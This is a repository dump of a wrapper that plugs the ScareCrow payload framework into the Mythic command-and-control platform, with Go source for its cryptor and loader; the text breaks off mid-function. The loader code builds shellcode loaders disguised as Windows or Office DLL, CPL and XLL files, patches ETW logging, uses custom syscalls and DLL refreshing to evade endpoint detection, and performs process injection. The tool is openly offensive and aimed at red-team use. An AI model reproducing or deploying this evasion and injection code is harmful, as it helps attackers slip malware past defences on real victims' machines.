├── .gitignore ├── C2_Profiles └── .keep ├── Payload_Type ├── .keep └── scarecrow_wrapper │ ├── Dockerfile │ ├── agent_code │ ├── README.md │ └── ScareCrow │ │ ├── .DS_Store │ │ ├── Cryptor │ │ └── Cryptor.go │ │ ├── LICENSE │ │ ├── Loader │ │ └── Loader.go │ │ ├── README.md │ │ ├── ScareCrow │ │ ├── ScareCrow.go │ │ ├── Screenshots │ │ ├── File_Attributes.png │ │ ├── PreRefreshed_Dlls.png │ │ ├── Refreshed_Dlls.png │ │ └── ScareCrow.png │ │ ├── Struct │ │ └── Struct.go │ │ ├── Utils │ │ └── Utils.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── limelighter │ │ └── limelighter.go │ │ └── main.json │ └── mythic │ ├── agent_functions │ ├── __init__.py │ └── builder.py │ ├── mythic_service.py │ ├── payload_service.sh │ └── rabbitmq_config.json ├── README.md ├── agent_icons └── .keep ├── config.json ├── documentation-c2 └── .keep ├── documentation-payload └── .keep └── documentation-wrapper └── .keep /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.py[cod] 3 | # Sphinx documentation 4 | docs/_build/ 5 | # Environments 6 | .env 7 | .venv 8 | env/ 9 | venv/ 10 | ENV/ 11 | env.bak/ 12 | venv.bak/ 13 | # pycharm 14 | .idea/ 15 | # ssl certs 16 | ssl/ 17 | # Mythic files 18 | files/ 19 | mythic_access.* 20 | postgres-docker/database/ 21 | rabbitmq-docker/storage/ 22 | display_output.txt 23 | ## Ignore Visual Studio temporary files, build results, and 24 | ## files generated by popular Visual Studio add-ons. 25 | ## 26 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 27 | 28 | # User-specific files 29 | *.suo 30 | *.user 31 | *.userosscache 32 | *.sln.docstates 33 | 34 | # User-specific files (MonoDevelop/Xamarin Studio) 35 | *.userprefs 36 | 37 | # Build results 38 | [Dd]ebug/ 39 | [Dd]ebugPublic/ 40 | [Rr]elease/ 41 | [Rr]eleases/ 42 | x64/ 43 | x86/ 44 | bld/ 45 | [Bb]in/ 46 | [Oo]bj/ 47 | [Ll]og/ 48 | 49 | # Visual Studio 2015/2017 cache/options directory 50 | .vs/ 51 | # Uncomment if you have tasks that create the project's static files in wwwroot 52 | #wwwroot/ 53 | 54 | # Visual Studio 2017 auto generated files 55 | Generated\ Files/ 56 | 57 | # MSTest test Results 58 | [Tt]est[Rr]esult*/ 59 | [Bb]uild[Ll]og.* 60 | 61 | # NUNIT 62 | *.VisualState.xml 63 | TestResult.xml 64 | 65 | # Build Results of an ATL Project 66 | [Dd]ebugPS/ 67 | [Rr]eleasePS/ 68 | dlldata.c 69 | 70 | # Benchmark Results 71 | BenchmarkDotNet.Artifacts/ 72 | 73 | # .NET Core 74 | project.lock.json 75 | project.fragment.lock.json 76 | artifacts/ 77 | **/Properties/launchSettings.json 78 | 79 | # StyleCop 80 | StyleCopReport.xml 81 | 82 | # Files built by Visual Studio 83 | *_i.c 84 | *_p.c 85 | *_i.h 86 | *.ilk 87 | *.meta 88 | *.obj 89 | *.iobj 90 | *.pch 91 | *.pdb 92 | *.ipdb 93 | *.pgc 94 | *.pgd 95 | *.rsp 96 | *.sbr 97 | *.tlb 98 | *.tli 99 | *.tlh 100 | *.tmp 101 | *.tmp_proj 102 | *.log 103 | *.vspscc 104 | *.vssscc 105 | .builds 106 | *.pidb 107 | *.svclog 108 | *.scc 109 | 110 | # Chutzpah Test files 111 | _Chutzpah* 112 | 113 | # Visual C++ cache files 114 | ipch/ 115 | *.aps 116 | *.ncb 117 | *.opendb 118 | *.opensdf 119 | *.sdf 120 | *.cachefile 121 | *.VC.db 122 | *.VC.VC.opendb 123 | 124 | # Visual Studio profiler 125 | *.psess 126 | *.vsp 127 | *.vspx 128 | *.sap 129 | 130 | # Visual Studio Trace Files 131 | *.e2e 132 | 133 | # TFS 2012 Local Workspace 134 | $tf/ 135 | 136 | # Guidance Automation Toolkit 137 | *.gpState 138 | 139 | # ReSharper is a .NET coding add-in 140 | _ReSharper*/ 141 | *.[Rr]e[Ss]harper 142 | *.DotSettings.user 143 | 144 | # vscode 145 | .vscode/ -------------------------------------------------------------------------------- /C2_Profiles/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/C2_Profiles/.keep -------------------------------------------------------------------------------- /Payload_Type/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/.keep -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM itsafeaturemythic/python38_payload:0.0.7 2 | RUN apt-get update && apt-get install -y osslsigncode openssl mingw-w64 wget --no-install-recommends 3 | WORKDIR /tmp 4 | RUN wget https://storage.googleapis.com/golang/go1.14.linux-amd64.tar.gz 5 | RUN tar -C /usr/local -xzf go1.14.linux-amd64.tar.gz 6 | RUN ln -s /usr/local/go/bin/go /usr/bin/go -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/README.md: -------------------------------------------------------------------------------- 1 | ScareCrow version 2.3 -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/.DS_Store -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Cryptor/Cryptor.go: -------------------------------------------------------------------------------- 1 | package Cryptor 2 | 3 | import ( 4 | "bytes" 5 | "crypto/rand" 6 | "encoding/hex" 7 | "errors" 8 | "fmt" 9 | "log" 10 | crand "math/rand" 11 | "time" 12 | ) 13 | 14 | const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 15 | 16 | var ( 17 | ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize") 18 | 19 | ErrInvalidPKCS7Data = errors.New("[-] Invalid PKCS7 Data (Empty or Not Padded)") 20 | 21 | ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input") 22 | ) 23 | 24 | func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) { 25 | if blocksize <= 0 { 26 | return nil, ErrInvalidBlockSize 27 | } 28 | if b == nil || len(b) == 0 { 29 | return nil, ErrInvalidPKCS7Data 30 | } 31 | n := blocksize - (len(b) % blocksize) 32 | pb := make([]byte, len(b)+n) 33 | copy(pb, b) 34 | copy(pb[len(b):], bytes.Repeat([]byte{byte(n)}, n)) 35 | return pb, nil 36 | } 37 | 38 | func RandomBuffer(size int) []byte { 39 | buffer := make([]byte, size) 40 | _, err := rand.Read(buffer) 41 | if err != nil { 42 | log.Fatal(err) 43 | } 44 | return buffer 45 | } 46 | 47 | func RandStringBytes(n int) string { 48 | b := make([]byte, n) 49 | for i := range b { 50 | b[i] = letters[crand.Intn(len(letters))] 51 | 52 | } 53 | return string(b) 54 | } 55 | 56 | func VarNumberLength(min, max int) string { 57 | var r string 58 | crand.Seed(time.Now().UnixNano()) 59 | num := crand.Intn(max-min) + min 60 | n := num 61 | r = RandStringBytes(n) 62 | return r 63 | } 64 | 65 | func printHexOutput(input ...[]byte) { 66 | for _, i := range input { 67 | fmt.Println(hex.EncodeToString(i)) 68 | } 69 | } 70 | 71 | func GenerateNumer(min, max int) int { 72 | crand.Seed(time.Now().UnixNano()) 73 | num := crand.Intn(max-min) + min 74 | n := num 75 | return n 76 | 77 | } 78 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Optiv Security 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Loader/Loader.go: -------------------------------------------------------------------------------- 1 | package Loader 2 | 3 | import ( 4 | "ScareCrow/Cryptor" 5 | "ScareCrow/Struct" 6 | "ScareCrow/Utils" 7 | "bufio" 8 | "bytes" 9 | "encoding/base64" 10 | "encoding/hex" 11 | "fmt" 12 | "io/ioutil" 13 | "log" 14 | "os" 15 | "strings" 16 | "text/template" 17 | ) 18 | 19 | type Binary struct { 20 | Variables map[string]string 21 | } 22 | 23 | type JScript struct { 24 | Variables map[string]string 25 | } 26 | 27 | type JScriptLoader struct { 28 | Variables map[string]string 29 | } 30 | 31 | type SandboxJScript struct { 32 | Variables map[string]string 33 | } 34 | 35 | type ETW struct { 36 | Variables map[string]string 37 | } 38 | 39 | type DLL struct { 40 | Variables map[string]string 41 | } 42 | type WindowsVersion struct { 43 | Variables map[string]string 44 | } 45 | type Sandboxfunction struct { 46 | Variables map[string]string 47 | } 48 | type Sandbox_DomainJoined struct { 49 | Variables map[string]string 50 | } 51 | type HTALoader struct { 52 | Variables map[string]string 53 | } 54 | type Macro struct { 55 | Variables map[string]string 56 | } 57 | 58 | var ( 59 | buffer bytes.Buffer 60 | ) 61 | 62 | func FileName(mode string) (string, string) { 63 | var filename string 64 | var name string 65 | wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"} 66 | dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"} 67 | cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"} 68 | officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"} 69 | Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"} 70 | 71 | if mode == "excel" { 72 | name = officename[Cryptor.GenerateNumer(0, 9)] 73 | filename = name + ".xll" 74 | } 75 | if mode == "control" { 76 | name = cplname[Cryptor.GenerateNumer(0, 20)] 77 | filename = name + ".cpl" 78 | } 79 | if mode == "wscript" { 80 | name = wscript[Cryptor.GenerateNumer(0, 10)] 81 | filename = name + ".dll" 82 | } 83 | 84 | if mode == "dll" { 85 | name = dllname[Cryptor.GenerateNumer(0, 9)] 86 | filename = name + ".dll" 87 | } 88 | 89 | if mode == "msiexec" { 90 | name = dllname[Cryptor.GenerateNumer(0, 9)] 91 | filename = name + ".dll" 92 | } 93 | if mode == "binary" { 94 | name = Binaryname[Cryptor.GenerateNumer(0, 8)] 95 | filename = name + ".exe" 96 | } 97 | return name, filename 98 | } 99 | 100 | func ETW_Buff() (string, string) { 101 | var buffer bytes.Buffer 102 | ETW := &ETW{} 103 | ETW.Variables = make(map[string]string) 104 | ETW.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9) 105 | ETW.Variables["procEtwNotificationRegister"] = Cryptor.VarNumberLength(4, 9) 106 | ETW.Variables["procEtwEventRegister"] = Cryptor.VarNumberLength(4, 9) 107 | ETW.Variables["procEtwEventWriteFull"] = Cryptor.VarNumberLength(4, 9) 108 | ETW.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) 109 | ETW.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 9) 110 | ETW.Variables["hProcess"] = Cryptor.VarNumberLength(4, 9) 111 | ETW.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 9) 112 | ETW.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 9) 113 | ETW.Variables["nSize"] = Cryptor.VarNumberLength(4, 9) 114 | ETW.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 9) 115 | ETW.Variables["ETW"] = Cryptor.VarNumberLength(4, 9) 116 | ETW.Variables["handle"] = Cryptor.VarNumberLength(4, 9) 117 | ETW.Variables["dataAddr"] = Cryptor.VarNumberLength(4, 9) 118 | ETW.Variables["i"] = Cryptor.VarNumberLength(4, 9) 119 | ETW.Variables["data"] = Cryptor.VarNumberLength(4, 9) 120 | ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9) 121 | ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) 122 | 123 | buffer.Reset() 124 | ETWTemplate, err := template.New("ETW").Parse(Struct.ETW_Function()) 125 | if err != nil { 126 | log.Fatal(err) 127 | } 128 | buffer.Reset() 129 | if err := ETWTemplate.Execute(&buffer, ETW); err != nil { 130 | log.Fatal(err) 131 | } 132 | return buffer.String(), ETW.Variables["ETW"] 133 | } 134 | 135 | func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string) string { 136 | var LoaderTemplate, DLLStructTemplate string 137 | DLL := &DLL{} 138 | DLL.Variables = make(map[string]string) 139 | Sandboxfunction := &Sandboxfunction{} 140 | Sandboxfunction.Variables = make(map[string]string) 141 | Sandbox_DomainJoined := &Sandbox_DomainJoined{} 142 | Sandbox_DomainJoined.Variables = make(map[string]string) 143 | WindowsVersion := &WindowsVersion{} 144 | WindowsVersion.Variables = make(map[string]string) 145 | 146 | DLL.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12) 147 | DLL.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, DLL.Variables["fullciphertext"], true) 148 | DLL.Variables["key"] = b64key 149 | DLL.Variables["iv"] = b64iv 150 | DLL.Variables["vkey"] = Cryptor.VarNumberLength(4, 12) 151 | DLL.Variables["viv"] = Cryptor.VarNumberLength(4, 12) 152 | DLL.Variables["block"] = Cryptor.VarNumberLength(4, 12) 153 | DLL.Variables["decrypted"] = Cryptor.VarNumberLength(4, 12) 154 | DLL.Variables["mode"] = Cryptor.VarNumberLength(4, 12) 155 | DLL.Variables["vciphertext"] = Cryptor.VarNumberLength(4, 12) 156 | DLL.Variables["rawdata"] = Cryptor.VarNumberLength(4, 12) 157 | DLL.Variables["stuff"] = Cryptor.VarNumberLength(4, 12) 158 | DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 159 | DLL.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 160 | DLL.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(4, 12) 161 | DLL.Variables["length"] = Cryptor.VarNumberLength(4, 12) 162 | DLL.Variables["src"] = Cryptor.VarNumberLength(4, 12) 163 | DLL.Variables["unpadding"] = Cryptor.VarNumberLength(4, 12) 164 | 165 | DLL.Variables["ptr"] = Cryptor.VarNumberLength(4, 12) 166 | DLL.Variables["buff"] = Cryptor.VarNumberLength(4, 12) 167 | DLL.Variables["virtualAlloc"] = Cryptor.VarNumberLength(4, 12) 168 | DLL.Variables["alloc"] = Cryptor.VarNumberLength(4, 12) 169 | DLL.Variables["phandle"] = Cryptor.VarNumberLength(4, 12) 170 | DLL.Variables["baseA"] = Cryptor.VarNumberLength(4, 12) 171 | DLL.Variables["zerob"] = Cryptor.VarNumberLength(4, 12) 172 | DLL.Variables["alloctype"] = Cryptor.VarNumberLength(4, 12) 173 | DLL.Variables["protect"] = Cryptor.VarNumberLength(4, 12) 174 | DLL.Variables["regionsizep"] = Cryptor.VarNumberLength(4, 12) 175 | DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 176 | DLL.Variables["WQRH"] = Cryptor.VarNumberLength(4, 12) 177 | DLL.Variables["xx"] = Cryptor.VarNumberLength(4, 12) 178 | DLL.Variables["yy"] = Cryptor.VarNumberLength(4, 12) 179 | DLL.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 12) 180 | DLL.Variables["k"] = Cryptor.VarNumberLength(4, 12) 181 | DLL.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 182 | DLL.Variables["MV"] = Cryptor.VarNumberLength(4, 12) 183 | DLL.Variables["MinV"] = Cryptor.VarNumberLength(4, 12) 184 | DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12) 185 | DLL.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 12) 186 | 187 | DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12) 188 | 189 | DLL.Variables["loc"] = Cryptor.VarNumberLength(4, 12) 190 | DLL.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 191 | DLL.Variables["error"] = Cryptor.VarNumberLength(4, 12) 192 | DLL.Variables["x"] = Cryptor.VarNumberLength(4, 12) 193 | DLL.Variables["file"] = Cryptor.VarNumberLength(4, 12) 194 | DLL.Variables["loaddll"] = Cryptor.VarNumberLength(4, 12) 195 | DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 196 | DLL.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 197 | DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 198 | DLL.Variables["old"] = Cryptor.VarNumberLength(4, 12) 199 | DLL.Variables["mem"] = Cryptor.VarNumberLength(4, 12) 200 | DLL.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 201 | DLL.Variables["ptr"] = Cryptor.VarNumberLength(4, 12) 202 | DLL.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 203 | DLL.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(4, 12) 204 | DLL.Variables["loader"] = Cryptor.VarNumberLength(4, 12) 205 | DLL.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 206 | DLL.Variables["VirtualProtect"] = Cryptor.VarNumberLength(4, 12) 207 | DLL.Variables["procVirtualProtect"] = Cryptor.VarNumberLength(4, 12) 208 | DLL.Variables["Reloading"] = Cryptor.VarNumberLength(4, 12) 209 | DLL.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 210 | DLL.Variables["getWin"] = Cryptor.VarNumberLength(4, 12) 211 | DLL.Variables["showWin"] = Cryptor.VarNumberLength(4, 12) 212 | DLL.Variables["hwnd"] = Cryptor.VarNumberLength(4, 12) 213 | 214 | DLL.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(4, 12) 215 | DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 216 | DLL.Variables["runfunc"] = Cryptor.VarNumberLength(4, 12) 217 | DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 218 | DLL.Variables["NewProtect"] = Cryptor.VarNumberLength(4, 12) 219 | DLL.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12) 220 | DLL.Variables["baseAddress"] = Cryptor.VarNumberLength(4, 12) 221 | DLL.Variables["regionSize"] = Cryptor.VarNumberLength(4, 12) 222 | DLL.Variables["processHandle"] = Cryptor.VarNumberLength(4, 12) 223 | DLL.Variables["handlez"] = Cryptor.VarNumberLength(4, 12) 224 | DLL.Variables["syscall"] = Cryptor.VarNumberLength(4, 12) 225 | DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12) 226 | DLL.Variables["NtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 227 | DLL.Variables["sysid"] = Cryptor.VarNumberLength(4, 12) 228 | DLL.Variables["bytesdata"] = Cryptor.VarNumberLength(4, 12) 229 | DLL.Variables["locdata"] = Cryptor.VarNumberLength(4, 12) 230 | DLL.Variables["xdata"] = Cryptor.VarNumberLength(4, 12) 231 | DLL.Variables["dllBasedata"] = Cryptor.VarNumberLength(4, 12) 232 | DLL.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12) 233 | DLL.Variables["memdata"] = Cryptor.VarNumberLength(4, 12) 234 | 235 | DLL.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12) 236 | DLL.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 237 | DLL.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12) 238 | DLL.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12) 239 | DLL.Variables["Target"] = Cryptor.VarNumberLength(4, 12) 240 | DLL.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 241 | DLL.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 242 | DLL.Variables["buf"] = Cryptor.VarNumberLength(4, 12) 243 | DLL.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 244 | DLL.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12) 245 | DLL.Variables["data"] = Cryptor.VarNumberLength(4, 12) 246 | DLL.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 247 | DLL.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 248 | DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 249 | DLL.Variables["err"] = Cryptor.VarNumberLength(4, 12) 250 | DLL.Variables["file"] = Cryptor.VarNumberLength(4, 12) 251 | DLL.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 252 | DLL.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12) 253 | DLL.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 254 | DLL.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 255 | DLL.Variables["hModule"] = Cryptor.VarNumberLength(4, 12) 256 | DLL.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12) 257 | DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 258 | DLL.Variables["handleSize"] = Cryptor.VarNumberLength(4, 12) 259 | DLL.Variables["hh"] = Cryptor.VarNumberLength(4, 12) 260 | DLL.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12) 261 | DLL.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12) 262 | DLL.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12) 263 | DLL.Variables["mi"] = Cryptor.VarNumberLength(4, 12) 264 | DLL.Variables["MI"] = Cryptor.VarNumberLength(4, 12) 265 | DLL.Variables["mod"] = Cryptor.VarNumberLength(4, 12) 266 | DLL.Variables["modules"] = Cryptor.VarNumberLength(4, 12) 267 | DLL.Variables["module"] = Cryptor.VarNumberLength(4, 12) 268 | DLL.Variables["nLength"] = Cryptor.VarNumberLength(4, 12) 269 | DLL.Variables["nSize"] = Cryptor.VarNumberLength(4, 12) 270 | DLL.Variables["name"] = Cryptor.VarNumberLength(4, 12) 271 | DLL.Variables["needed"] = Cryptor.VarNumberLength(4, 12) 272 | DLL.Variables["n"] = Cryptor.VarNumberLength(4, 12) 273 | DLL.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12) 274 | DLL.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12) 275 | DLL.Variables["outString"] = Cryptor.VarNumberLength(4, 12) 276 | DLL.Variables["pi"] = Cryptor.VarNumberLength(4, 12) 277 | DLL.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 278 | DLL.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 279 | DLL.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 280 | DLL.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 281 | DLL.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 282 | DLL.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 283 | DLL.Variables["process"] = Cryptor.VarNumberLength(4, 12) 284 | DLL.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12) 285 | DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 286 | DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 287 | DLL.Variables["s"] = Cryptor.VarNumberLength(4, 12) 288 | DLL.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 289 | DLL.Variables["si"] = Cryptor.VarNumberLength(4, 12) 290 | DLL.Variables["size"] = Cryptor.VarNumberLength(4, 12) 291 | DLL.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12) 292 | DLL.Variables["x"] = Cryptor.VarNumberLength(4, 12) 293 | DLL.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12) 294 | DLL.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 295 | DLL.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 296 | DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12) 297 | 298 | if sandbox == true { 299 | DLL.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12) 300 | DLL.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 301 | DLL.Variables["status"] = Cryptor.VarNumberLength(4, 12) 302 | SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) 303 | if err != nil { 304 | log.Fatal(err) 305 | } 306 | if err := SandboxFunctionTemplate.Execute(&buffer, DLL); err != nil { 307 | log.Fatal(err) 308 | } 309 | DLL.Variables["Sandboxfunction"] = buffer.String() 310 | DLL.Variables["checker"] = Cryptor.VarNumberLength(4, 12) 311 | Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) 312 | buffer.Reset() 313 | if err != nil { 314 | log.Fatal(err) 315 | } 316 | if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, DLL); err != nil { 317 | log.Fatal(err) 318 | } 319 | DLL.Variables["Sandbox"] = buffer.String() 320 | buffer.Reset() 321 | } else { 322 | DLL.Variables["Sandbox"] = "" 323 | DLL.Variables["Sandboxfunction"] = "" 324 | DLL.Variables["SandboxImport"] = "" 325 | } 326 | 327 | WindowsVersion.Variables["Version"] = DLL.Variables["Version"] 328 | WindowsVersion.Variables["syscall"] = DLL.Variables["syscall"] 329 | WindowsVersion.Variables["customsyscall"] = DLL.Variables["customsyscall"] 330 | WindowsVersion.Variables["customsyscallVP"] = DLL.Variables["customsyscallVP"] 331 | 332 | buffer.Reset() 333 | if ETW == true { 334 | ETW_Function, ETW := ETW_Buff() 335 | DLL.Variables["ETW"] = ETW + "()" 336 | DLL.Variables["ETW_Function"] = ETW_Function 337 | } else { 338 | DLL.Variables["ETW"] = "" 339 | DLL.Variables["ETW_Function"] = "" 340 | } 341 | if refresher == false { 342 | LoaderTemplate = Struct.WindowsVersion_DLL_Refresher() 343 | DLLStructTemplate = Struct.DLL_Refresher() 344 | } else { 345 | LoaderTemplate = Struct.WindowsVersion_DLL() 346 | DLLStructTemplate = Struct.DLL() 347 | } 348 | if ProcessInjection != "" && refresher == false { 349 | ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) 350 | DLL.Variables["processpath"] = ProcessInjection 351 | LoaderTemplate = Struct.WindowsVersion_DLL_Refresher() 352 | DLLStructTemplate = Struct.Procces_Injection_DLL() 353 | } 354 | 355 | WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(LoaderTemplate) 356 | if err != nil { 357 | log.Fatal(err) 358 | 359 | } 360 | buffer.Reset() 361 | if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { 362 | log.Fatal(err) 363 | } 364 | 365 | DLL.Variables["SyscallNumberlist"] = buffer.String() 366 | 367 | if mode == "excel" { 368 | DLL.Variables["ExportName"] = Struct.JS_Office_Export() 369 | 370 | } 371 | if mode == "control" { 372 | DLL.Variables["ExportName"] = Struct.JS_Control_Export() 373 | 374 | } 375 | if mode == "wscript" || mode == "dll" { 376 | DLL.Variables["ExportName"] = Struct.WS_JS_Export() 377 | } 378 | 379 | if mode == "msiexec" { 380 | DLL.Variables["ExportName"] = Struct.WS_JS_Export() 381 | } 382 | 383 | buffer.Reset() 384 | 385 | DLLTemplate, err := template.New("DLL").Parse(DLLStructTemplate) 386 | if err != nil { 387 | log.Fatal(err) 388 | } 389 | buffer.Reset() 390 | if err := DLLTemplate.Execute(&buffer, DLL); err != nil { 391 | log.Fatal(err) 392 | } 393 | return buffer.String() 394 | 395 | } 396 | 397 | func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string) string { 398 | var Structure string 399 | var buffer bytes.Buffer 400 | Binary := &Binary{} 401 | Sandboxfunction := &Sandboxfunction{} 402 | Sandboxfunction.Variables = make(map[string]string) 403 | Sandbox_DomainJoined := &Sandbox_DomainJoined{} 404 | Sandbox_DomainJoined.Variables = make(map[string]string) 405 | Binary.Variables = make(map[string]string) 406 | WindowsVersion := &WindowsVersion{} 407 | WindowsVersion.Variables = make(map[string]string) 408 | Binary.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12) 409 | 